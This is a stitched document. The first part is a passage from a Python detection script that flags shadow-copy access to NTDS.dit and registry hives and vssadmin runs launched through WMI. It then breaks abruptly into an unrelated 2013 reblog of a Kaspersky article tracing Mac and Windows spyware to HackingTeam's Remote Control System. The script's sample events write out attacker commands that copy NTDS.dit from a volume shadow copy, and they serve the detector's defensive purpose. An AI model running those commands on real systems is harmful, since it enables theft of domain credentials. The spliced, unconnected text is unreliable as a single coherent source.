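    cmd = event.get("command_line", "")
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    via_wmi = parent == WMI_HOST_PROCESS
    if SHADOW_PATH.search(cmd) and SENSITIVE_FILE.search(cmd):
        findings.append(("high", "NTDS.dit or registry hive read out of a volume shadow copy"))
    elif SHADOW_PATH.search(cmd):
        findings.append(("medium", "direct access to a shadow copy device path"))
    if VSSADMIN_CMD.search(cmd):
        # Backup jobs run vssadmin too; the remote-WMI parent is what makes it suspicious.
        findings.append(("medium" if via_wmi else "low", "vssadmin shadow copy enumeration/creation"))
    if via_wmi and findings:
        findings.append(("info", "launched remotely through WMI (parent WmiPrvSE.exe)"))
    return findings


def scan(events):
    """Events with at least one finding as (top_severity, host, command_line, findings),
    most severe first."""
    hits = []
    for ev in events:
        findings = classify_event(ev)
        if findings:
            top = min(findings, key=lambda f: SEVERITY[f[0]])[0]
            hits.append((top, ev["host"], ev["command_line"], findings))
    hits.sort(key=lambda h: SEVERITY[h[0]])
    return hits


# Constructed sample records: the post's commands, a local backup job, and a benign command.
SAMPLE_EVENTS = [
    {"host": "DC1", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd /c vssadmin list shadows 2>&1 > C:\temp\output.txt"},
    {"host": "DC1", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"},
    {"host": "DC1", "image": r"C:\Windows\System32\vssadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"vssadmin create shadow /for=C:"},
    {"host": "DC1", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd /c dir C:\temp"},
]

if __name__ == "__main__":
    for top, host, cmd, findings in scan(SAMPLE_EVENTS):
        print(f"[{top.upper():6}] {host}: {cmd}")
        for sev, reason in findings:
            print(f"          {sev}: {reason}")
```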

      

Spyware. HackingTeam…..

May 9, 2013


HackingTeam

HackingTeam first caught our attention back in 2011, when WikiLeaks released documents describing the functions of the spyware programs the company offers to government agencies in 2008.

In early 2012, Kaspersky Lab experts detected malicious programs running on Windows that were suspiciously similar to the programs described on WikiLeaks, and with Remote Control System, the description of which was published on the company’s official website www.hackingteam.it. However, at the time, we had no way of knowing about the connections between the threats that were detected (Kaspersky Lab detects them as Korablin) and the HackingTeam spyware program.

 
The program’s description from HackingTeam’s website http://www.hackingteam.it/images/stories/RCS2012.pdf

That all changed in July 2012, when many antivirus companies received an email with an example of malicious code for Mac OS X with the same functions.

Our email address newvirus@kaspersky.com received this email on July 24, 2012 at 05:51:24 MSK. The subject line was empty, and there was no text — just an attachment called AdobeFlashPlayer.zip. The attachment had a self-signed JAR file containing a program written for Mac OS X.

 
The header of the email was addressed to newvirus@kaspersky.com

Soon, nearly all antivirus companies had added detection of this new malware, and each company named it differently (Crizis, DaVinci, Boychi, etc. — Kaspersky Lab named it ‘Morcut’). Nearly all antivirus companies suspected that the program was developed by HackingTeam, which sells specialized tracking software to law enforcement agencies in a number of countries.

Evidence

The fact that the functions are similar is just one of three circumstantial pieces of evidence linking HackingTeam to the files that were analyzed. Let’s take a look at the other two.

The data overhead in the Mac file contained the names of files and modules that the authors used when writing the program code. These names were also seen several times with “RCS”, which coincides with the abbreviation of the Remote Control System name (this abbreviation is used by HackingTeam in its promotional materials and its own description of the program on their website).

P/s:- This article is an excerpt from Securelist http://www.securelist.com from Kaspersky Lab. Hope you all enjoy reading it…!
